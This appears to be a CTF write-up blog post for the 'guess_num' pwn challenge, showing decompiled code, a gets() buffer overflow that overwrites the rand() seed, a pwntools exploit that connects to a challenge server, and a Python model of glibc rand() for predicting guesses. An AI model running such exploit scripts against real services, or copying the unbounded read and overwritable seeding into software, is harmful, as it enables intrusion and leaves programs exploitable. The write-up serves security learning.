guess_num

Challenge description: A noob is playing a guess-the-number game, but no matter what he does he cannot win. Can you help him?

Challenge attachment: attachment 1


Output of file:

64-bit ELF file

Output of checksec:

Decompile in IDA and look at main:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int v4; // [rsp+4h] [rbp-3Ch]
  int i; // [rsp+8h] [rbp-38h]
  int v6; // [rsp+Ch] [rbp-34h]
  char v7; // [rsp+10h] [rbp-30h]            name buffer: 0x20 bytes below seed
  unsigned int seed[2]; // [rsp+30h] [rbp-10h]
  unsigned __int64 v9; // [rsp+38h] [rbp-8h] stack canary

  v9 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  v4 = 0;
  v6 = 0;
  *(_QWORD *)seed = sub_BB0();                // seed is set BEFORE the name is read
  puts("-------------------------------");
  puts("Welcome to a guess number game!");
  puts("-------------------------------");
  puts("Please let me know your name!");
  printf("Your name:", 0LL);
  gets(&v7);                                  // unbounded read into v7: overflow
  srand(seed[0]);                             // seeded with the (now overwritable) value
  for ( i = 0; i <= 9; ++i )
  {
    v6 = rand() % 6 + 1;
    printf("-------------Turn:%d-------------\n", (unsigned int)(i + 1));
    printf("Please input your guess number:");
    __isoc99_scanf("%d", &v4);
    puts("---------------------------------");
    if ( v4 != v6 )
    {
      puts("GG!");
      exit(1);
    }
    puts("Success!");
  }
  sub_C3E();
  return 0LL;
}

There is a buffer overflow here: gets() reads an unbounded line into v7 at rbp-0x30, and seed lies at rbp-0x10, so anything past 0x20 bytes of input lands in seed. The canary (v9, at rbp-8) sits right after seed, so a payload of exactly 0x28 bytes only touches seed; gets() then places its terminating null byte in the canary's lowest byte, which is zero anyway on x86-64 glibc.

Look at sub_C3E:

__int64 sub_C3E()
{
  printf("You are a prophet!\nHere is your flag!");
  system("cat flag");
  return 0LL;
}

The program generates random numbers from 1 to 6 and asks you to guess them; guess correctly 10 times in a row and it gives you the flag.

Note that the buffer overflow in main can overwrite the random seed, so we can overwrite the seed with a fixed value. Every run then produces the same sequence of numbers, which we can find by trying it out locally and simply input.

Exploit:

from pwn import *

#io = process('./pwn')
io = connect('220.249.52.133', 30596)

# 0x20 bytes fill the name buffer, the next 8 overwrite seed[0] and seed[1]
# with 'aaaa' (0x61616161), so srand() always gets the same value.
payload = b'a'*0x28

io.sendlineafter(b'name:', payload)

# The sequence rand() % 6 + 1 produces for that fixed seed, found locally.
guesses = [5, 6, 4, 6, 6, 2, 3, 6, 2, 2]
for g in guesses:
    io.sendlineafter(b'number:', str(g).encode())

io.interactive()
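Instead of finding the ten numbers by trial, the sequence can be computed directly, because glibc's rand() is fully determined by the seed. The following added example (not the write-up's code) models glibc's srand()/rand() in pure Python and derives the expected guesses for any seed value, including the 0x61616161 that the four overflowing 'a' bytes leave in seed[0]; it also illustrates why a game whose seed an input can overwrite, or that uses any guessable seed, is not random at all. The constants are glibc's; the function names are my own.

```python
# Pure-Python model of glibc's TYPE_3 rand()/srand() (random_r.c):
# a 31-word state filled by an LCG, 310 outputs discarded by srand(),
# then an additive feedback generator whose output is the 32-bit word >> 1.


def glibc_rand_sequence(seed: int, count: int) -> list:
    """Return the first `count` values rand() yields after srand(seed).

    `seed` is the 32-bit value passed to srand(); glibc maps 0 to 1 and
    treats the word as a signed 32-bit int internally.
    """
    seed &= 0xFFFFFFFF
    if seed == 0:
        seed = 1
    if seed >= 1 << 31:               # reinterpret as int32, like state[0]
        seed -= 1 << 32
    total = 344 + count               # 34 set-up entries + 310 discarded outputs
    r = [0] * total
    r[0] = seed
    for i in range(1, 31):            # LCG fill of the 31-word state
        r[i] = (16807 * r[i - 1]) % 2147483647
    for i in range(31, 34):           # the feedback taps start 3 words apart
        r[i] = r[i - 31]
    for i in range(34, total):        # r[i] = r[i-31] + r[i-3], 32-bit wraparound
        r[i] = (r[i - 31] + r[i - 3]) & 0xFFFFFFFF
    return [r[i] >> 1 for i in range(344, total)]


def predict_guesses(seed: int, rounds: int = 10) -> list:
    """The numbers main() expects each turn: rand() % 6 + 1."""
    return [v % 6 + 1 for v in glibc_rand_sequence(seed, rounds)]


if __name__ == "__main__":
    # 0x61616161 is what four 'a' bytes leave in seed[0] (little-endian)
    # after the write-up's payload of 0x28 'a' bytes.
    print(predict_guesses(0x61616161))
```

Run against a local copy of the binary, the printed list should be exactly the ten answers the game accepts for that payload.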

posted @ 2020-12-05 00:18  hktk1643